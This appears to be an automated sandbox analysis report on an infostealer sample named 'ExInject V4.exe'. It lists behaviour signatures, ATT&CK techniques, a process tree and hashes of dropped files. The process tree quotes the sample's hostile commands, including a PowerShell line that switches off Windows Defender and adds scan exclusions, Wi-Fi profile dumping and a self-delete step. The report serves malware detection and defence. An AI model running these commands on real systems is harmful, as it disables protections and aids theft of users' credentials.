6957aa3b521d1ddcc4a512e2fe7aa93eabf58e9a53a4acd4866c4930a881de28

Analysis

max time kernel
121s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
09/05/2024, 13:50

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ExInject V4.exe
Size

40.4MB
MD5

b5376b0ac908c1ff23f00ba4b4823f87
SHA1

89f270e1404a76594b0780d70a7ab9491b1e0de3
SHA256

6957aa3b521d1ddcc4a512e2fe7aa93eabf58e9a53a4acd4866c4930a881de28
SHA512

49c1704611beec9469cb47c74fa285404afe33b442a2aa64dd0a4efdb5bc2cf523096d1fca9044f81d7e9ea8488f7ee8b9f3b7d015aee1bec4167bf69d555d40
SSDEEP

393216:zWvz+q3V1VUIC3L+9qz8GvD7fEU2IGY/Vt1Wom6:Sz+q37/O+9q4GL7fEvILpm6

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5040	powershell.exe
1476	powershell.exe
2916	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ExInject V4.exe	ExInject V4.exe

Loads dropped DLL 49 IoCs

pid	Process
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023479-88.dat	upx
behavioral2/memory/3832-92-0x00007FFFEF6C0000-0x00007FFFEFD90000-memory.dmp	upx
behavioral2/files/0x0007000000023473-100.dat	upx
behavioral2/files/0x0007000000023454-105.dat	upx
behavioral2/files/0x000700000002345c-125.dat	upx
behavioral2/files/0x0007000000023453-117.dat	upx
behavioral2/files/0x0007000000023472-129.dat	upx
behavioral2/memory/3832-130-0x00007FF803E70000-0x00007FF803E85000-memory.dmp	upx
behavioral2/memory/3832-131-0x00007FFFEF190000-0x00007FFFEF6B2000-memory.dmp	upx
behavioral2/files/0x000700000002345a-123.dat	upx
behavioral2/files/0x0007000000023459-122.dat	upx
behavioral2/files/0x0007000000023458-121.dat	upx
behavioral2/memory/3832-133-0x00007FF802BB0000-0x00007FF802BBD000-memory.dmp	upx
behavioral2/files/0x000700000002347c-136.dat	upx
behavioral2/memory/3832-139-0x00007FFFFE7F0000-0x00007FFFFE7FD000-memory.dmp	upx
behavioral2/memory/3832-138-0x00007FF802BA0000-0x00007FF802BAD000-memory.dmp	upx
behavioral2/files/0x0007000000023457-137.dat	upx
behavioral2/memory/3832-135-0x00007FF802190000-0x00007FF8021A9000-memory.dmp	upx
behavioral2/files/0x0007000000023456-119.dat	upx
behavioral2/files/0x0007000000023455-118.dat	upx
behavioral2/files/0x0007000000023452-116.dat	upx
behavioral2/files/0x0007000000023450-115.dat	upx
behavioral2/files/0x000700000002344e-114.dat	upx
behavioral2/files/0x000700000002347e-112.dat	upx
behavioral2/files/0x000700000002347d-111.dat	upx
behavioral2/files/0x0007000000023477-109.dat	upx
behavioral2/files/0x0007000000023474-108.dat	upx
behavioral2/memory/3832-127-0x00007FFFFE800000-0x00007FFFFE82D000-memory.dmp	upx
behavioral2/memory/3832-126-0x00007FF803F90000-0x00007FF803FA9000-memory.dmp	upx
behavioral2/files/0x000700000002344f-104.dat	upx
behavioral2/memory/3832-103-0x00007FF8067A0000-0x00007FF8067AF000-memory.dmp	upx
behavioral2/memory/3832-102-0x00007FF8021B0000-0x00007FF8021D5000-memory.dmp	upx
behavioral2/files/0x0007000000023451-98.dat	upx
behavioral2/memory/3832-143-0x00007FFFFE0E0000-0x00007FFFFE1AD000-memory.dmp	upx
behavioral2/memory/3832-142-0x00007FFFFE1B0000-0x00007FFFFE1E3000-memory.dmp	upx
behavioral2/memory/3832-146-0x00007FFFFE520000-0x00007FFFFE536000-memory.dmp	upx
behavioral2/memory/3832-150-0x00007FFFFD990000-0x00007FFFFD9C4000-memory.dmp	upx
behavioral2/memory/3832-149-0x00007FFFFE0C0000-0x00007FFFFE0D2000-memory.dmp	upx
behavioral2/memory/3832-148-0x00007FFFEF6C0000-0x00007FFFEFD90000-memory.dmp	upx
behavioral2/memory/3832-155-0x00007FF803E70000-0x00007FF803E85000-memory.dmp	upx
behavioral2/memory/3832-160-0x00007FFFFD940000-0x00007FFFFD958000-memory.dmp	upx
behavioral2/memory/3832-159-0x00007FF802BB0000-0x00007FF802BBD000-memory.dmp	upx
behavioral2/files/0x0007000000023476-158.dat	upx
behavioral2/memory/3832-156-0x00007FFFEF010000-0x00007FFFEF187000-memory.dmp	upx
behavioral2/memory/3832-154-0x00007FFFFD960000-0x00007FFFFD984000-memory.dmp	upx
behavioral2/files/0x0007000000023463-165.dat	upx
behavioral2/memory/3832-166-0x00007FFFF9E90000-0x00007FFFF9EB7000-memory.dmp	upx
behavioral2/memory/3832-168-0x00007FFFEEEF0000-0x00007FFFEF00B000-memory.dmp	upx
behavioral2/memory/3832-163-0x00007FFFFE780000-0x00007FFFFE78B000-memory.dmp	upx
behavioral2/files/0x0007000000023427-169.dat	upx
behavioral2/memory/3832-173-0x00007FFFFE0E0000-0x00007FFFFE1AD000-memory.dmp	upx
behavioral2/files/0x0007000000023424-182.dat	upx
behavioral2/memory/3832-185-0x00007FFFFD960000-0x00007FFFFD984000-memory.dmp	upx
behavioral2/memory/3832-184-0x00007FFFF8130000-0x00007FFFF813C000-memory.dmp	upx
behavioral2/memory/3832-188-0x00007FFFF02F0000-0x00007FFFF02FC000-memory.dmp	upx
behavioral2/memory/3832-187-0x00007FFFF03A0000-0x00007FFFF03AB000-memory.dmp	upx
behavioral2/memory/3832-186-0x00007FFFEF010000-0x00007FFFEF187000-memory.dmp	upx
behavioral2/memory/3832-183-0x00007FFFFD7D0000-0x00007FFFFD7DB000-memory.dmp	upx
behavioral2/files/0x000700000002342a-181.dat	upx
behavioral2/memory/3832-189-0x00007FFFF02E0000-0x00007FFFF02ED000-memory.dmp	upx
behavioral2/memory/3832-180-0x00007FFFFD840000-0x00007FFFFD84C000-memory.dmp	upx
behavioral2/memory/3832-200-0x00007FFFEEB40000-0x00007FFFEEB52000-memory.dmp	upx
behavioral2/memory/3832-199-0x00007FFFEEB60000-0x00007FFFEEB6D000-memory.dmp	upx
behavioral2/memory/3832-201-0x00007FFFEEB30000-0x00007FFFEEB3C000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
25	raw.githubusercontent.com
26	raw.githubusercontent.com
34	discord.com
35	discord.com
38	discord.com
39	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	api.ipify.org
13	api.ipify.org
37	api.ipify.org

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4360	WMIC.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2044	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
3832	ExInject V4.exe
768	powershell.exe
768	powershell.exe
5040	powershell.exe
5040	powershell.exe
1476	powershell.exe
1476	powershell.exe
2916	powershell.exe
2916	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	ExInject V4.exe
Token: SeIncreaseQuotaPrivilege	4768	WMIC.exe
Token: SeSecurityPrivilege	4768	WMIC.exe
Token: SeTakeOwnershipPrivilege	4768	WMIC.exe
Token: SeLoadDriverPrivilege	4768	WMIC.exe
Token: SeSystemProfilePrivilege	4768	WMIC.exe
Token: SeSystemtimePrivilege	4768	WMIC.exe
Token: SeProfSingleProcessPrivilege	4768	WMIC.exe
Token: SeIncBasePriorityPrivilege	4768	WMIC.exe
Token: SeCreatePagefilePrivilege	4768	WMIC.exe
Token: SeBackupPrivilege	4768	WMIC.exe
Token: SeRestorePrivilege	4768	WMIC.exe
Token: SeShutdownPrivilege	4768	WMIC.exe
Token: SeDebugPrivilege	4768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4768	WMIC.exe
Token: SeRemoteShutdownPrivilege	4768	WMIC.exe
Token: SeUndockPrivilege	4768	WMIC.exe
Token: SeManageVolumePrivilege	4768	WMIC.exe
Token: 33	4768	WMIC.exe
Token: 34	4768	WMIC.exe
Token: 35	4768	WMIC.exe
Token: 36	4768	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4768	WMIC.exe
Token: SeSecurityPrivilege	4768	WMIC.exe
Token: SeTakeOwnershipPrivilege	4768	WMIC.exe
Token: SeLoadDriverPrivilege	4768	WMIC.exe
Token: SeSystemProfilePrivilege	4768	WMIC.exe
Token: SeSystemtimePrivilege	4768	WMIC.exe
Token: SeProfSingleProcessPrivilege	4768	WMIC.exe
Token: SeIncBasePriorityPrivilege	4768	WMIC.exe
Token: SeCreatePagefilePrivilege	4768	WMIC.exe
Token: SeBackupPrivilege	4768	WMIC.exe
Token: SeRestorePrivilege	4768	WMIC.exe
Token: SeShutdownPrivilege	4768	WMIC.exe
Token: SeDebugPrivilege	4768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4768	WMIC.exe
Token: SeRemoteShutdownPrivilege	4768	WMIC.exe
Token: SeUndockPrivilege	4768	WMIC.exe
Token: SeManageVolumePrivilege	4768	WMIC.exe
Token: 33	4768	WMIC.exe
Token: 34	4768	WMIC.exe
Token: 35	4768	WMIC.exe
Token: 36	4768	WMIC.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	WMIC.exe
Token: SeSecurityPrivilege	3928	WMIC.exe
Token: SeTakeOwnershipPrivilege	3928	WMIC.exe
Token: SeLoadDriverPrivilege	3928	WMIC.exe
Token: SeSystemProfilePrivilege	3928	WMIC.exe
Token: SeSystemtimePrivilege	3928	WMIC.exe
Token: SeProfSingleProcessPrivilege	3928	WMIC.exe
Token: SeIncBasePriorityPrivilege	3928	WMIC.exe
Token: SeCreatePagefilePrivilege	3928	WMIC.exe
Token: SeBackupPrivilege	3928	WMIC.exe
Token: SeRestorePrivilege	3928	WMIC.exe
Token: SeShutdownPrivilege	3928	WMIC.exe
Token: SeDebugPrivilege	3928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3928	WMIC.exe
Token: SeRemoteShutdownPrivilege	3928	WMIC.exe
Token: SeUndockPrivilege	3928	WMIC.exe
Token: SeManageVolumePrivilege	3928	WMIC.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 3832	1312	ExInject V4.exe	86
PID 1312 wrote to memory of 3832	1312	ExInject V4.exe	86
PID 3832 wrote to memory of 5104	3832	ExInject V4.exe	89
PID 3832 wrote to memory of 5104	3832	ExInject V4.exe	89
PID 5104 wrote to memory of 4768	5104	cmd.exe	91
PID 5104 wrote to memory of 4768	5104	cmd.exe	91
PID 3832 wrote to memory of 412	3832	ExInject V4.exe	92
PID 3832 wrote to memory of 412	3832	ExInject V4.exe	92
PID 412 wrote to memory of 3220	412	cmd.exe	94
PID 412 wrote to memory of 3220	412	cmd.exe	94
PID 3832 wrote to memory of 2196	3832	ExInject V4.exe	95
PID 3832 wrote to memory of 2196	3832	ExInject V4.exe	95
PID 2196 wrote to memory of 768	2196	cmd.exe	97
PID 2196 wrote to memory of 768	2196	cmd.exe	97
PID 2196 wrote to memory of 5040	2196	cmd.exe	100
PID 2196 wrote to memory of 5040	2196	cmd.exe	100
PID 2196 wrote to memory of 1476	2196	cmd.exe	101
PID 2196 wrote to memory of 1476	2196	cmd.exe	101
PID 2196 wrote to memory of 2916	2196	cmd.exe	102
PID 2196 wrote to memory of 2916	2196	cmd.exe	102
PID 3832 wrote to memory of 2508	3832	ExInject V4.exe	106
PID 3832 wrote to memory of 2508	3832	ExInject V4.exe	106
PID 2508 wrote to memory of 3928	2508	cmd.exe	108
PID 2508 wrote to memory of 3928	2508	cmd.exe	108
PID 3832 wrote to memory of 3256	3832	ExInject V4.exe	109
PID 3832 wrote to memory of 3256	3832	ExInject V4.exe	109
PID 3832 wrote to memory of 520	3832	ExInject V4.exe	111
PID 3832 wrote to memory of 520	3832	ExInject V4.exe	111
PID 520 wrote to memory of 4360	520	cmd.exe	113
PID 520 wrote to memory of 4360	520	cmd.exe	113
PID 3832 wrote to memory of 4112	3832	ExInject V4.exe	114
PID 3832 wrote to memory of 4112	3832	ExInject V4.exe	114
PID 4112 wrote to memory of 2612	4112	cmd.exe	116
PID 4112 wrote to memory of 2612	4112	cmd.exe	116
PID 3832 wrote to memory of 3868	3832	ExInject V4.exe	117
PID 3832 wrote to memory of 3868	3832	ExInject V4.exe	117
PID 3868 wrote to memory of 824	3868	cmd.exe	119
PID 3868 wrote to memory of 824	3868	cmd.exe	119
PID 3832 wrote to memory of 2316	3832	ExInject V4.exe	122
PID 3832 wrote to memory of 2316	3832	ExInject V4.exe	122
PID 2316 wrote to memory of 2044	2316	cmd.exe	124
PID 2316 wrote to memory of 2044	2316	cmd.exe	124

C:\Users\Admin\AppData\Local\Temp\ExInject V4.exe
"C:\Users\Admin\AppData\Local\Temp\ExInject V4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1312
- C:\Users\Admin\AppData\Local\Temp\ExInject V4.exe
  "C:\Users\Admin\AppData\Local\Temp\ExInject V4.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3928
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
      4⤵
      PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\ExInject V4.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:2044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI13122\Cryptodome\Cipher\_raw_cbc.pyd

Filesize
10KB

MD5
6c604891a4c1ee77eeb2f40a36c28d1a

SHA1
5b43c4d162f69987f44c0ecf3eaf6653242df9ee

SHA256
8b93fbec6f87679764d202fb0aea30ff3239a2c56f7316713bc28ad28a9c702b

SHA512
f3f5353e0183ec175567d125d4beebd2fe2832c479e94da4640a6af65bc177be92106cc5cbde1052a2b7aa34caa0e3f72f75192277a94e2e0ba10a51daa33203

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\Cryptodome\Cipher\_raw_cfb.pyd

Filesize
10KB

MD5
b9cd9ed29ef230a681204e620f246736

SHA1
d32f47026b930543112f7c66a86f67f8ff5037d6

SHA256
48f0d2271948aeb6b9298af7ac3a549940e2a73285d7e292b5437d9991e488b7

SHA512
582bee1b5ce43d9d0c521c58795059fda89631e926f012a56e0ccc9ea8191c2371c5425a806acab3728403a3ed7fdf604597f28a024e8f4e285f8c2d97376839

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\Cryptodome\Cipher\_raw_ctr.pyd

Filesize
11KB

MD5
4edf450ba9e7ed3d8ab90b59264e33da

SHA1
6ba7686aae696fc733ee48b56eb9fd8bc5c19801

SHA256
752d2370f2841b3a0a07dd6ab4d4ea2138ff7ec6283aa7ab51c4f796701c6787

SHA512
0f22b50c5a1163c3ae0e40bfd6befe007dd893c3276207cb0f3b773c81618a3b5a9419676fefdab81f637dc33ac5c9c8adb2965530eac5c57d7f8ee270d4d975

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\Cryptodome\Cipher\_raw_ecb.pyd

Filesize
9KB

MD5
4efbbc5ff0543474cc27bc42307cc613

SHA1
5640fadcc6781b30b9de6e5b7255ebe563aeec2e

SHA256
ff0c76c0da4c9e9264502789f75f6f75c9dd90ee981f53b19f1f5e9f45211663

SHA512
b70801f9f578136f1b914e33b14e50496a43ecc70e8c73570a920efe84703cb6176ae9ec145269420efb3acd3a79c7f7c0cae27da5c5b9858e5d4739f09e7004

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\Cryptodome\Cipher\_raw_ofb.pyd

Filesize
10KB

MD5
e57cb265746f2016e8556e0c842a5083

SHA1
22f4a2b87e8df403502bac3efab4f46385df2d7c

SHA256
fb012e7903f96dcb5ebc22c076701c3bcca2ee7f930826dfebdd55b02e806525

SHA512
48db6fd0715ed558836ed6e29b9042bc24d890d64343f8d8c65520dc7d8d462762f07c6514d5710967d8c6fa90d7d5ef73b4f631f65750cedadd2e1ef72b6275

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\VCRUNTIME140_1.dll

Filesize
48KB

MD5
7e668ab8a78bd0118b94978d154c85bc

SHA1
dbac42a02a8d50639805174afd21d45f3c56e3a0

SHA256
e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f

SHA512
72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_asyncio.pyd

Filesize
37KB

MD5
dec44ffe7b2922cc46f8930d7c27943d

SHA1
1deece09643b5759559310f1e29ebf2545d8ccb7

SHA256
d8f3f8505a6ac7ad2b6268ddb44d6bb308b239f2e31dda7b850c49373550b21f

SHA512
182652fb4f7afda921b1217d2a731c3c4ca802f46b2f050d73344addd980a110c61b34e63eec66a975f8d72551640d00dde39a525d9ecdeaabd3d8c4af75fe47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_bz2.pyd

Filesize
48KB

MD5
85c70974fac8e621ed6e3e9a993fbd6f

SHA1
f83974e64aa57d7d027b815e95ebd7c8e45530f1

SHA256
610983bbcb8ee27963c17ead15e69ad76ec78fac64deb7345ca90d004034cdd6

SHA512
142792750e4a5189dbeaa710e3f5b3689d593927ea77ded00eb5caada6b88d82a37459770845f1ea7c9f45da5a6ae70e19bfcf76d9f1a56184c3164b736bcb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_cffi_backend.cp312-win_amd64.pyd

Filesize
71KB

MD5
26624b2ea2b9ec0e6ddec72f064c181a

SHA1
2658bae86a266def37cce09582874c2da5c8f6fa

SHA256
9fcab2f71b7b58636a613043387128394e29fe6e0c7ed698abdc754ba35e6279

SHA512
a5315700af222cdb343086fd4a4e8a4768050fdf36e1f8041770a131fc6f45fefe806291efc1cfb383f975e123d378a029d9884244a420523fc58b8178e8571f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_ctypes.pyd

Filesize
59KB

MD5
e7ef30080c1785baf2f9bb8cf5afe1b2

SHA1
b7d7d0e3b15de9b1e177b57fd476cecbdd4fcb79

SHA256
2891382070373d5070cb8fd6676afc9f5eb4236251f8fc5c0941af0c53a2d31e

SHA512
c2ec431d2821879bb505d8eca13fa3921db016e00b8674fa62b03f27dc5cee6dd0de16ba567d19d4b0af9a5cb34d544383a68cc63ff2fa9d8bb55e356d0d73e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_decimal.pyd

Filesize
105KB

MD5
3923e27b9378da500039e996222ffee6

SHA1
a9280559a71abf390348e1b6a0fb1f2409649189

SHA256
0275b03041f966e587d1c4c50266c3fdff1e1a65f652ad07b59cb85845b5457e

SHA512
051c613403fd80b9582dd48c1f38870cb26846d54b75603ea52a78202a72272107e95750de78cd8f6c56951ebde501b4892d90fb306326b86124c8cc97bca594

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_hashlib.pyd

Filesize
35KB

MD5
c8b153f0be8569ce2c2de3d55952d9c7

SHA1
0861d6dcd9b28abb8b69048caf3c073e94f87fdc

SHA256
af9f39d2a5d762214f6de2c8fec0a5bc6be0b8223ef47164caa4c6e3d6437a58

SHA512
81ccbfff0f4cdd1502af9d73928b940098b9acc58b19c1a939ecdf17418096294af4a4529ee7a0bbe1c686e3b0254651e211c1093264d1835065a82711ac0379

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_lzma.pyd

Filesize
85KB

MD5
bc2ebd2a95619ab14a16944b0ab8bde5

SHA1
c31ba45b911a2664fc622bb253374ab7512fc35a

SHA256
aeb3fd8b855b35204b5088c7a1591cc1ca78fffe707d70e41d99564b6cb617c6

SHA512
86a6685efec72860991c0f0fa50f46a208211d3f8fc44012b12437d141c5f1a24c34a366f164d225869680707b482ab27a2720c698ebe8026f1c5807e81f8437

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_multiprocessing.pyd

Filesize
27KB

MD5
a0d009556def6620998b32b1c00e30e9

SHA1
5ecb08222c5b4690f946623a26084e3eecd2a52a

SHA256
779daf36e38b9463d1158da62ccbde7e7210d78cbdf2ac3861f4435974f7889d

SHA512
85a888aa5a104d016e67818dbab8587140549c1374ec4df7aba6758c3306e0c5d3225ea13f8b83850e1d74a3580ab5a1a6bbdf7df7bedb545f7cb526f3206d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_overlapped.pyd

Filesize
33KB

MD5
f14f9b9ffcd3ea9a5d1bcadc57e5095b

SHA1
4ff618d07f30efbc42b6fd2d7adcdb7d6409c966

SHA256
b52e73ccd4164594414ee57e4e7d9d8337d2260b47bef9a0547db1ae482d917c

SHA512
69b292040a8319b32e7849b487227de9d3fa915fb08fee72c1691a46036b6c9adac15c4049db25cd49d22f4df08faa7e5926f264d23493de6157bf47a335ce39

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_queue.pyd

Filesize
26KB

MD5
fcbb24550f59068a37ea09a490923c8a

SHA1
1e51d9c156354e00909c9f016ddb392a832f8078

SHA256
de2ac6d99234a28dcf583d90dca7256de986fca9e896c9aafd1f18bb536978b8

SHA512
62474bf9d5f39591240f71fd9270fcc7a2b2c0b4a1f93cbb57021040ad85b3ab8c401d17aedf0141105118772f453c6137a026736f069cc7a965cb30e5479f07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13122\_socket.pyd

Filesize
44KB

MD5
f6d0876b14bca5a264ec231895d80072

SHA1
d68b662cfc247c07851ef0764fe9652e3e2c0981

SHA256
bcbf9a952473e53f130ce77b0db69fe08c5845ce10dbe8c320b40f171a15d6a8

SHA512
